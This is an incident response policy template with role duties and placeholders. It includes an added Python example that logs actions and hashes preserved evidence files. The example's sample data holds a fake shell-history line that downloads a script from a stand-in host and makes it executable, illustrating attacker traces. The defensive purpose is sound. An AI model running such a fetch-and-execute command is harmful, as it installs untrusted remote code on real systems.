What Is Truth to Power?

Truth to Power (T2P) is dedicated to bridging the gaps between governance and practice, technology and business, regulation and control, risk management and real market pressures, and your own knowledge and the knowledge of your peers.

It is built to create a common pool of knowledge, one big brain, that lets you work more efficiently, build technology and business practices more effectively, and endure audits more effortlessly.

It is a neutral hub through which you can reach many valuable information nodes, resource collections, and organizations that are already helping people like you, but in fractured ways.

It stands against the idea that auditors, analysts, and consultancies can control information simply through their ability to collect and distill it. T2P's goal is to unlock the vast body of knowledge, insight, and conventional wisdom that we all have, make it freely available to you, and help you digest and interpret it, without undue cost, bias, or hype.

Incident Response (Policy)

Overview and purpose

As the threats to information systems multiply, the number of computer security incidents rises and the cost of business disruption and service restoration escalates. While information security practices and policies attempt to protect information systems from improper access, the complexity of networks and the increasing sophistication of cybercriminals mean that [variable: Covered Organization] computer systems may still be compromised.

A well-organized response to the discovery of a system breach or data exposure can mean the difference between a relatively minor market reaction and a prolonged, devastating episode of financial and customer hardship. Incident response seeks to limit the damage of incidents and to protect [variable: Covered Organization] information, as well as the information of others potentially affected by the incident. Finally, a solid incident response also lays the technical groundwork (preserved evidence and a record of the actions taken) for investigation and legal recourse against the parties responsible for the incident.

This document describes the requirements for responding to computer security incidents. Security incidents include, but are not limited to:

  • Detection of a virus, worm, or Trojan horse
  • Discovery of unauthorized use of computer accounts and computer systems
  • Complaints of improper use of Information Resources, as outlined in the Acceptable Use Policies for Systems, Email, and Internet

Coverage

This policy applies to all individuals who use any [variable: Covered Organization] Information Resources.

Definitions

General Terminology

Roles and Functions

Policy

  • The organization assigns individuals to a [variable: Name of response team; e.g., CIRT, CSIRC, CERT].
  • If an incident is suspected or confirmed, the appropriate Incident Management procedures must be followed.
  • Response team members have defined roles and responsibilities that take priority over their normal duties when required.

Director

  • Immediately informs [variable: Covered Organization] management of significant incidents (e.g., major compromise of data, denial of service)

Information Security Officer (ISO) or Information Systems Security Officer (ISSO):

  • Notifies the Director of significant incidents and of the response plan
  • Determines whether identified incidents are computer-security related
  • Works with law enforcement, system users, system administrators, and the network manager/administrator as necessary to formulate an initial incident response plan
  • Works with system users, system administrators, and the network manager/administrator to review and, if necessary, modify the incident response plan
  • Provides updates to management on incident response plan and progress
  • Determines if incident follow-up is indicated
  • Submits reports regarding incident response and follow-up

System Supervisor:

  • Educates employees on incident response requirements
  • Contacts the ISO/ISSO within [variable: Time frame] after an incident is discovered
  • Works with law enforcement, system users and/or administrators, the network manager/administrator, and the ISSO to formulate an initial response plan
  • Updates management on status of incident response
  • Ensures required incident and incident response reports are prepared and submitted to ISO/ISSO within required timelines

System User / System Administrator: If a system user or administrator is informed of, or suspects, an incident, he or she should perform the following tasks:

  • Investigate and validate incident occurrence
    • If suspicion is ungrounded, log and share knowledge with ISO/ISSO and networking manager/administrator
    • If suspicion is confirmed or indeterminate, confer with supervisor, ISO/ISSO, and networking manager/administrator
  • Start an event log, noting the date and time of every action taken
  • Take a snapshot of pertinent files (a preserved copy, with hashes and timestamps recorded) within the first half hour of the incident investigation
  • Identify scope of risk to systems or information
  • Confer with ISO/ISSO and networking manager/administrator
  • Begin to implement response plan within forty-five minutes of incident discovery
  • Notify management of significant incident and response plan
  • Continually monitor the situation
  • Assist supervisor in preparing preliminary and final report
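The two evidence-handling steps above (start an event log; snapshot pertinent files within the first half hour) are the ones most often done badly under pressure: notes are taken from memory afterwards, and "copies" are made with tools that alter the original or leave no way to prove the copy is faithful. The following is an added example, not part of the T2P policy template or of any procedure it references, showing one way a system administrator could carry out both steps in Python: an append-only UTC event log, plus a snapshot that copies each pertinent file, records its SHA-256 hash and metadata in a manifest, and can be re-verified later. The function names, the manifest layout, and the sample log lines are this example's own constructions.

```python
# Added example (not from the T2P policy template): event log + file snapshot
# helper for the System User / System Administrator steps. All names, paths,
# manifest fields and sample data below are this example's own assumptions.
import hashlib
import json
import os
import shutil
import stat
from datetime import datetime, timezone
from pathlib import Path


def utc_now() -> str:
    """Timestamp every action in UTC so logs from different hosts line up."""
    return datetime.now(timezone.utc).isoformat(timespec="seconds")


def log_event(log_path, actor: str, action: str) -> str:
    """Append one tab-separated line to the event log. Append-only: nothing is rewritten."""
    line = f"{utc_now()}\t{actor}\t{action}\n"
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line


def sha256_of(path) -> str:
    """Stream the file through SHA-256 so large logs do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot_files(paths, evidence_dir, log_path, actor: str) -> list:
    """Copy each pertinent file into evidence_dir, record hash and metadata in
    manifest.json, and log every action. Returns the manifest entries."""
    evidence_dir = Path(evidence_dir)
    evidence_dir.mkdir(parents=True, exist_ok=True)
    manifest = []
    for src in map(Path, paths):
        st = src.stat()  # capture metadata BEFORE reading: reading can bump atime
        digest = sha256_of(src)
        dest = evidence_dir / f"{src.name}.{digest[:12]}"
        shutil.copy2(src, dest)  # copy2 keeps mtime; the original is never modified
        if sha256_of(dest) != digest:
            raise RuntimeError(f"copy of {src} does not match the source hash")
        os.chmod(dest, stat.S_IRUSR)  # read-only so the copy is not edited by accident
        entry = {
            "source": str(src),
            "copy": str(dest),
            "sha256": digest,
            "size": st.st_size,
            "mtime_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(timespec="seconds"),
            "mode": oct(stat.S_IMODE(st.st_mode)),
            "captured_utc": utc_now(),
        }
        manifest.append(entry)
        log_event(log_path, actor, f"snapshot {src} -> {dest} sha256={digest}")
    manifest_path = evidence_dir / "manifest.json"
    manifest_path.write_text(json.dumps(manifest, indent=2), encoding="utf-8")
    log_event(log_path, actor, f"wrote manifest {manifest_path} ({len(manifest)} files)")
    return manifest


def verify_snapshot(evidence_dir) -> list:
    """Re-hash every preserved copy against manifest.json; returns the copies that no longer match."""
    manifest = json.loads((Path(evidence_dir) / "manifest.json").read_text(encoding="utf-8"))
    return [e["copy"] for e in manifest if sha256_of(e["copy"]) != e["sha256"]]


if __name__ == "__main__":
    import tempfile
    # Constructed sample input: two "pertinent files" on a throwaway directory.
    work = Path(tempfile.mkdtemp())
    (work / "auth.log").write_text("Jan 1 00:00:01 host sshd[1]: Accepted password for root from 203.0.113.5\n")
    (work / ".bash_history").write_text("wget http://example.invalid/x.sh\nchmod +x x.sh\n")
    log = work / "incident-events.log"
    log_event(log, "sysadmin", "incident suspected; investigation started")
    entries = snapshot_files([work / "auth.log", work / ".bash_history"], work / "evidence", log, "sysadmin")
    print(f"{len(entries)} files preserved; mismatches on verify: {verify_snapshot(work / 'evidence')}")
    print(log.read_text())
```

The design points worth copying into a real procedure: metadata is read before the file content, the originals are never written to, every copy is hashed again after copying and then made read-only, and the manifest plus the event log give the ISO/ISSO and, if it comes to that, law enforcement a record that can be re-verified with `verify_snapshot` at any later time.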

Networking Manager/Administrator:

  • Works with the users and/or system administrators, and the ISO/ISSO, to formulate an initial response plan
  • Assists as required to evaluate and mitigate incident
  • Reviews response plan and, if necessary, assists in modifying the plan

Enforcement

Violation of this policy may result in disciplinary action, which may include termination for employees and temporaries; termination of the engagement in the case of contractors or consultants; dismissal for interns and volunteers; or suspension or expulsion in the case of students. Additionally, personnel are subject to loss of [variable: Covered Organization] Information Resources access privileges and to civil and criminal prosecution.

Supporting Documentation

This policy is supported by the following rules, standards, and procedures:

  • [variable: internal documents (with links, if available)]
  • [variable: external documents (with links, if available)]

Policy Support Contact

  • [variable: title (not personal name) of the role responsible for overseeing this policy]
  • [variable: contact information of the office responsible for overseeing this policy]

References

Policy Model(s)
